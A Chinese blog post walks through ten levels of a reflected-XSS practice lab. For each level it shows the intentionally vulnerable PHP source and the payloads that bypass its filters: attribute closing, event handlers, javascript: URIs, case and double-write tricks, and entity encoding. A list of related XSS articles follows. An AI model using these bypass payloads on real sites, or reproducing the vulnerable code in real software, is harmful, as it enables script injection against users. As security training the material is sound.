XSS学习

最新推荐文章于 2024-09-10 15:48:00 发布
最新推荐文章于 2024-09-10 15:48:00 发布
阅读量176 收藏 1
点赞数 4
分类专栏: 安全 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/F1or_/article/details/120648195
版权

xss在我看来,类似于sql注入

练习地址http://test.ctf8.com/

Level 1

在这里插入图片描述
查看源码

<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>

name=<script>alert(1)</script>

最基础的一个会导致弹窗。
在这里插入图片描述

Level 2

在这里插入图片描述

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>

构造的点在<input name=keyword value="'.$str.'">

keyword="><script>alert(1)</script>
keyword=" onmouseover=alert(1)><br>
keyword=" onclick=alert(1)><br>

第二种第三种需要鼠标滑过,点击进行弹窗。
闭合后的语句为

<input name=keyword  value=""><script>alert(1)</script>">
<input name=keyword  value="" οnmοuseοver=alert(1)><br>">

这里htmlspecialchars($str)函数,把预定义的字符 “<” (小于)和 “>” (大于)转换为 HTML 实体,使得可能的XSS无法构成。

但是通过构造闭合,使得value=" ",这样就不会影响我们的弹窗代码。

但是这道题只是在echo上进行了函数执行,在下面input时并没这个函数,我:????

Level 3

在这里插入图片描述

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>

这道题在input的时候也有htmlspecialchars($str)函数,构造闭合使value=’ ',便可以进行弹窗。
上一题中keyword="><script>alert(1)</script>这题无法使用了,<>被执行转义

keyword=' οnmοuseοver=alert(1)//
keyword=' onclick=alert(1)//

//为注释字符

Level 4

在这里插入图片描述

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

一个简单地绕过,str_replace将<>替换为空。

keyword=' οnmοuseοver=alert(1)//
keyword=' onclick=alert(1)//

之前palyload还是可以使用,也可以使用

" οnfοcus=alert(1) autofocus="

Level 5

在这里插入图片描述

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

过滤的更加严格on,<script>因为有strtolower这个函数,使得大写无法绕过,这样就过滤了js事件

"><iframe src=javascript:alert(1)>

在这里插入图片描述

iframe元素会创建包含另外一个文档的内联框架(即行内框架)。内框架中使得报错。
也可以使用伪协议

"> <a href="javascript:alert(1)">bmjoker</a>

"> <a href="javascript:%61lert(1)">bmjoker</a> //

Level 6

在这里插入图片描述

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

一长串替换,但是没有过滤大小写,之前的payload改一下大小写都可以使用。这里就列举一个

"> <Script>alert("F1or")</Script>

在这里插入图片描述

Level 7

在这里插入图片描述

<?php 
  ini_set("display_errors", 0);
  $str =strtolower( $_GET["keyword"]);
  $str2=str_replace("script","",$str);
  $str3=str_replace("on","",$str2);
  $str4=str_replace("src","",$str3);
  $str5=str_replace("data","",$str4);
  $str6=str_replace("href","",$str5);
  echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
  <form action=level7.php method=GET>
    <input name=keyword  value="'.$str6.'">
    <input type=submit name=submit value=搜索 />
    </form>
  </center>';
?>

替换成空值,双写绕过就好

"><sscriptcript>alert("F1or")</sscriptcript>

在这里插入图片描述

Level 8

在这里插入图片描述

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>

过滤许多,最后将"转义,但是没有过滤& #这一类符号,可以通过url编码绕过

javascrip&#x74;:alert(1)

在这里插入图片描述

Level 9

在这里插入图片描述

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>

和上一题一样的过滤,只不过最后加了个strpos来判断str7中是否含有http://

javascrip&#x74;:alert(1)//http://

利用注释符号,将http://加入
在这里插入图片描述

Level 10

在这里插入图片描述

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

传入的keyword没啥用,主要是t_sort,下面但是被hidden了

t_sort="type="text" onclick = "alert(1)
t_sort=" onclick = alert(1) type="text""

构造闭合,type=text将输入框显示出来,然后点击输入框出现弹框
在这里插入图片描述

后面没写完,大家可以看看参考链接

F1or
关注
专栏目录
XSS学习总结
ad12456的博客
03-28 1522
xss学习
xss学习
doraemon12345的博客
05-27 331
学习小结 - 一般做题思路就是闭合题目给出的函数来完成我们的弹窗 - 反引号可以替换圆括号 - <svg>标签中可以直接执行实体字符。 <svg><script>alert&#40;1&#41;</script> - 换行可以绕过正则 - 可以利用onclick,onmouseover等事件进行弹窗如:onclick=alert(1),onmouseover=alert(1) - 可以用换行来绕过“/ /” - <!-- -->和&
XSSor:XSSor是Burp Suite的半自动反射式和持久性XSS检测器扩展。 该工具是由应用程序安全专家Barak Tawily用Python编写的。 XSSor旨在通过执行半自动反射和持久性XSS检测测试来帮助安全测试人员
05-09
XSSor XSSor是Burp Suite的半自动反射式和持久性XSS检测器扩展。 该工具是由应用程序安全专家Barak Tawily用Python编写的。 XSSor旨在通过执行半自动反射和持久XSS检测测试来帮助安全测试人员。 安装 Download Burp Suite (obviously): http://portswigger.net/burp/download.html Download Jython Standalone JAR: http://www.jython.org/downloads.html Open BurpàExtenderà Optionsà Python Environmentà Select Fileà Choose the Jython Standalone JAR To install XSSor follow these steps: 一种。
web基础之XSS
最新发布
m0_74080781的博客
09-10 1554
突然想到一个问题,我刚才制作的攻击语句中的IP是本地的回环地址,所以如果我在虚拟机的靶场中测试攻击,那么我的蓝莲花平台是接收不到的,所以这里先在本地的靶场测试,等下在演示在虚拟机中的(如果蓝莲花平台部署在云服务器,就能攻击其他互联网用户)(2)尝试了大佬的在线xss平台;(该平台主机上线有提示语音并且功能比蓝莲花和我搭建的另一个xss平台都好,所以就借助大佬搭建的xss平台作为本期演示平台)填写接收数据的url ,格式:当前蓝莲花平台的url + 文件名(文件名自己取)(1)首先尝试,不成功;
XSS平台:Web安全学习与实践的一站式解决方案
gitblog_00099的博客
04-13 463
XSS平台:Web安全学习与实践的一站式解决方案 去发现同类优质开源项目:https://gitcode.com/ 项目简介 是一个专门为Web安全爱好者和专业人士设计的学习、实验和挑战平台。它提供了一个模拟真实环境的在线沙箱,使用户可以在安全可控的环境中实践XSS(跨站脚本)攻防技术,了解并掌握相关知识。 技术分析 该平台采用了现代Web开发技术,包括但不限于: 前后端分离 - 使用React...
xss学习的一小步
一个码农的笔记
03-18 1195
学习地址: http://xss.pkav.net/xss/ 【一】绕过浏览器过滤的语句, http://wooyun.org/bugs/wooyun-2010-016672 【2】利用html编码绕过百度云加速: http://www.changwei.me/2015/index.php?q="/> 【3】检测xss 用\ http://wooyun.o
Xss学习研究平台源码.zip
05-12
在“Xss学习研究平台源码.zip”这个压缩包中,包含了一个用于学习和研究XSS攻击的测试平台。这个平台可以帮助开发者、安全研究员以及对网络安全感兴趣的人员深入理解XSS的工作原理,学习如何防御这种攻击。 XSS攻击...
XSS学习大全
05-02
"XSS学习大全"压缩包可能包含了各种XSS攻击实例、漏洞分析、防御策略以及相关工具的教程。这些资料可以帮助你深入理解XSS的原理,掌握如何发现和修复此类漏洞,同时了解黑客如何利用它们进行攻击。通过学习,你将...
XSS 学习笔记(源码分析)
jieli0901227的博客
11-30 875
XSS
XSS-Payload
03-04
:rocket: (XSS)有效负载列表 :rocket: 概述 已编译供公众使用的XSS列表。 您可以将其用作扫描仪的有效载荷 让我们连接: :
XSSOR:智能XSS工具箱,助力Web安全研究
gitblog_00086的博客
04-18 435
XSSOR:智能XSS工具箱,助力Web安全研究 去发现同类优质开源项目:https://gitcode.com/ 简介 是一个强大的跨平台XSS(Cross Site Scripting)攻击与防御测试工具集。它由著名的安全研究员Evilcos开发,旨在帮助Web开发者、安全研究人员和渗透测试人员更好地理解和处理XSS漏洞,提升网站的安全性。 技术分析 XSSOR的核心特性在于其自动化和智能化:...
XSS数据接收网站——XSS在线平台
p36273的博客
06-17 6986
平台的网址是:链接:XSS在线平台。
XSS攻击常识及实战
热门推荐
mathor的博客
10-31 1万+
什么是XSSXSS全称是Cross Site Scripting(为了和CSS进行区分,就叫XSS)即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了 XSS分类 XSS有三类:反射型XSS(非持久型)、存储型XSS(持久型)和DOM XSS 反射型XSS 发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响...
xss入门教程文档
记录,总结,成长
01-22 1696
http://www.shellsec.com/tech/196192.html 什么是XSS ? 跨站点脚本XSS代表。它基本上是一个攻击,那是用来执行HTML和JavaScript的Web页面。这种攻击可以通过提交查询到文本框,甚至到URL 。结果回来阅读的文本为HTML ,所以它执行的脚本,而不是显示在纯文本。 XSS攻击,你可以从一个网络管理员窃取cooki
XSS 的绕过和防御
发哥微课堂
04-21 1392
0x00:简介 最近在整理 TOP10 的审计点,上篇文章介绍了 A3XSS 问题,这里的 TOP10 是以 2013 的来记录的,对于 XSS 因为篇幅原因上篇只记录了一些示例代码,这篇顺便补充一下 XSS 的绕过和防御。 0x01:绕过 XSS 绕过方法很多,涉及到的面也非常广泛,我们这里只记录常见的一些绕过方式。 1,最基本的就是利用 <> 来写入 html 和 js 代...
XSS|跨站脚本攻击payload集合
qq_60115503的博客
05-09 4541
跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 常见的输出函数有: echo printf print print_r sprintf die var-dump var_export. #Alert Payload <s
xss (跨站脚本攻击)教程
U侠学子
02-09 1979
转自: https://excess-xss.com/ Part One: Overview What is XSS? Cross-site scripting (XSS) is a code injection attack that allows an attacker to execute malicious JavaScript in another user's b
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值